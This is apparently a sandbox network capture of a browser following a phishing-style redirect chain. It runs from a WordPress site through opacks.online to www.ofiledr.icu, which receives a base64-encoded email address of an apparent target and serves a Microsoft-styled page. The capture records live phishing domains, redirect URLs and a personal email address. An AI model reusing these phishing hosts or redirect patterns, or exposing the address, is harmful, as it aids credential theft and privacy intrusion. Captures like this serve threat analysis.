2025-01-13 14:28:12 UTC	605	OUT	GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.1 HTTP/1.1 Host: chiltonconsultingllc.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://chiltonconsultingllc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 14:28:12 UTC	877	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:12 GMT Content-Type: text/css Content-Length: 114706 Connection: close Last-Modified: Wed, 13 Nov 2024 19:30:16 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6HYiAJV2idNJ6DGNxxCIkG4VIwCvalkNaBNPhFy4oyMJTed%2BwuKqD%2F4jRDUegZ9v2SbYMcGpmGmgU8r9Sb08bMVTTUy%2FDqEp6D1fP6PvGY59AZxw9DBLhqjghxaDF5%2F0daLVW7AFd9Hf0I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9016124b7b9742fb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1886&min_rtt=1880&rtt_var=717&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2864&recv_bytes=1183&delivery_rate=1512169&cwnd=212&unsent_bytes=0&cid=ba373edcc78f598a&ts=1158&x=0"
2025-01-13 14:28:12 UTC	492	IN	Data Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 20 69 6d 67 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 Data Ascii: @charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-a
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 63 65 6e 74 65 72 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 61 6c 69 67 6e 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 29 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 74 65 78 74 2d 64 65 Data Ascii: center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-de
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 73 2d 73 74 79 6c 65 2d 73 71 75 61 72 65 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 6e 6f 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 6e 6f 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 29 2c 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3e 2e 77 70 2d 62 Data Ascii: s-style-squared{border-radius:0}.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{border-radius:0!important}:root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-b
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 69 67 68 74 2e 69 73 2d 76 65 72 74 69 63 61 6c 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 3a 6e 6f 74 28 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 2c 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 Data Ascii: ight.is-vertical{align-items:flex-end}.wp-block-buttons.is-content-justification-space-between{justify-content:space-between}.wp-block-buttons.aligncenter{text-align:center}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justific
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 77 70 2d 62 6c 6f 63 6b 2d 63 61 74 65 67 6f 72 69 65 73 2e 61 6c 69 67 6e 6c 65 66 74 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 61 74 65 67 6f 72 69 65 73 2e 61 6c 69 67 6e 72 69 67 68 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 61 74 65 67 6f 72 69 65 73 2e 77 70 2d 62 6c 6f 63 6b 2d 63 61 74 65 67 6f 72 69 65 73 2d 64 72 6f 70 64 6f 77 6e 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 61 74 65 67 6f 72 69 65 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 61 74 65 67 6f 72 69 65 73 5f 5f 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c Data Ascii: wp-block-categories.alignleft{margin-right:2em}.wp-block-categories.alignright{margin-left:2em}.wp-block-categories.wp-block-categories-dropdown.aligncenter{text-align:center}.wp-block-categories .wp-block-categories__label{display:block;width:100%}.wp-bl
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 73 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 37 35 65 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 3b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 2e 69 73 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 74 6f 70 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 Data Ascii: s){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}.wp-block-column{flex-grow:1;min-width:0;overflow-wrap:break-word;word-break:break-word}.wp-block-column.is-vertically-aligned-top{align-self:flex-start}.wp-block-colu
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 61 75 74 68 6f 72 20 63 69 74 65 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 20 62 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 20 2e 63 6f 6d 6d 65 6e 74 2d 61 77 61 69 74 69 6e 67 2d 6d 6f 64 65 72 61 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 Data Ascii: ents .comment-author cite{font-style:normal}.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;mar
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 73 20 69 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 29 3a 6e 6f 74 28 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 74 65 78 74 61 72 65 61 7b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 29 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d 70 61 67 69 6e 61 74 69 6f 6e 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 6e 65 78 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d Data Ascii: s input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 65 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 72 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 2d 74 65 6d 70 6c 61 74 65 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 2d 74 65 6d 70 6c 61 74 65 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 2d 6d 6f 7a 2d 66 69 74 2d 63 6f 6e 74 65 6e 74 3b 77 69 64 74 68 3a 66 69 74 2d 63 6f 6e 74 65 6e 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 2d 74 65 6d 70 6c 61 74 65 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f Data Ascii: e;margin-bottom:0;max-width:100%;padding-left:2rem}.wp-block-comment-template.alignleft{float:left}.wp-block-comment-template.aligncenter{margin-left:auto;margin-right:auto;width:-moz-fit-content;width:fit-content}.wp-block-comment-template.alignright{flo
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 6b 2d 63 6f 76 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 62 61 63 Data Ascii: k-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-bac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.16	49714	111.90.140.55	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:13 UTC	686	OUT	GET / HTTP/1.1 Host: opacks.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://chiltonconsultingllc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 14:28:14 UTC	159	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:14 GMT Server: Apache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-13 14:28:14 UTC	1111	IN	Data Raw: 34 34 62 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 76 61 6c 69 64 61 74 65 45 6d 61 69 6c 28 72 65 66 65 72 72 65 72 29 20 7b 0d 0a 76 61 72 20 72 65 20 3d 20 2f 5e 28 28 5b 5e 3c 3e 28 29 5b 5c 5d 5c 2e 2c 3b 3a 5c 73 40 5c 22 5d 2b 28 5c 2e 5b 5e 3c 3e 28 29 5b 5c 5d 5c 2e 2c 3b 3a 5c 73 40 5c 22 5d 2b 29 2a 29 7c 28 5c 22 2e 2b 5c 22 29 29 40 28 28 5c 5b 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 5d 29 7c 28 28 5b 61 2d 7a 41 2d 5a 5c 2d 30 2d 39 5d 2b 5c 2e 29 2b 5b 61 2d 7a 41 2d 5a 5d 7b 32 2c 7d 29 29 24 2f 3b 0d 0a 72 65 74 75 72 6e 20 72 65 2e 74 65 73 74 28 Data Ascii: 44b<script type="text/javascript" >function validateEmail(referrer) {var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)\|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])\|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;return re.test(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.16	49716	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:15 UTC	716	OUT	GET /?email=YmpwYXJpc2hAc3RlaW5ib3JuLmNvbQ== HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://opacks.online/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 14:28:17 UTC	561	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 14:28:15 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5; path=/ Location: https://www.ofiledr.icu/index.php?csrftoken=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.16	49717	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:17 UTC	861	OUT	GET /index.php?csrftoken=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://opacks.online/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:17 UTC	483	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 14:28:17 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: check.php?tap=p7mBCg9W07nEY2tzReNHAdQeksgfGq8fpkT2ic5rQTwbmLPI4F72lQtlllUBG4fWmoBFzfvss4U0MBVOWWdYCdNaTF0sTXUuEu9T2lovHJzG5JEQkPJicANgAMo08Nkg X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.16	49720	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:18 UTC	871	OUT	GET /check.php?tap=p7mBCg9W07nEY2tzReNHAdQeksgfGq8fpkT2ic5rQTwbmLPI4F72lQtlllUBG4fWmoBFzfvss4U0MBVOWWdYCdNaTF0sTXUuEu9T2lovHJzG5JEQkPJicANgAMo08Nkg HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://opacks.online/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:19 UTC	335	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:19 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-13 14:28:19 UTC	7857	IN	Data Raw: 33 65 36 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 Data Ascii: 3e6<!DOCTYPE html><html dir="ltr" lang="en-GB"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"/> <meta http-equiv="pragma" content="no-cache"/> <meta name="apple-mobile-w
2025-01-13 14:28:19 UTC	1346	IN	Data Raw: 2d 74 68 65 6d 65 50 72 69 6d 61 72 79 2d 62 65 66 6f 72 65 3a 62 65 66 6f 72 65 2c 20 2e 6d 73 2d 62 63 6c 2d 74 70 2d 68 3a 68 6f 76 65 72 2c 20 2e 6d 73 2d 62 63 6c 2d 74 70 2d 66 3a 66 6f 63 75 73 2c 20 2e 6d 73 2d 62 63 6c 2d 74 70 2d 62 3a 62 65 66 6f 72 65 20 7b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 40 63 6f 6c 6f 72 2d 74 68 65 6d 65 50 72 69 6d 61 72 79 3b 20 7d 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 53 65 63 6f 6e 64 61 72 79 2c 20 2e 6d 73 2d 62 63 6c 2d 74 73 2c 20 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 53 65 63 6f 6e 64 61 72 79 2d 68 6f 76 65 72 3a 68 6f 76 65 72 2c 20 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 53 65 63 6f 6e 64 61 72 79 2d 66 6f 63 75 73 3a Data Ascii: -themePrimary-before:before, .ms-bcl-tp-h:hover, .ms-bcl-tp-f:focus, .ms-bcl-tp-b:before { border-color: @color-themePrimary; }.ms-border-color-themeSecondary, .ms-bcl-ts, .ms-border-color-themeSecondary-hover:hover, .ms-border-color-themeSecondary-focus:
2025-01-13 14:28:19 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:19 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 72 41 6c 74 2d 66 6f 63 75 73 3a 66 6f 63 75 73 2c 20 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 4c 69 67 68 74 65 72 41 6c 74 2d 62 65 66 6f 72 65 3a 62 65 66 6f 72 65 2c 20 2e 6d 73 2d 62 63 6c 2d 74 6c 72 61 2d 68 3a 68 6f 76 65 72 2c 20 2e 6d 73 2d 62 63 6c 2d 74 6c 72 61 2d 66 3a 66 6f 63 75 73 2c 20 2e 6d 73 2d 62 63 6c 2d 74 6c 72 61 2d 62 3a 62 65 66 6f 72 65 20 7b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 40 63 6f 6c 6f 72 2d 74 68 65 6d 65 4c 69 67 68 74 65 72 41 6c 74 3b 20 7d 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 74 6f 70 2d 74 68 65 6d 65 50 72 69 6d 61 72 79 2c 20 2e 6d 73 2d 62 63 6c 2d 74 2d 74 70 2c 20 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 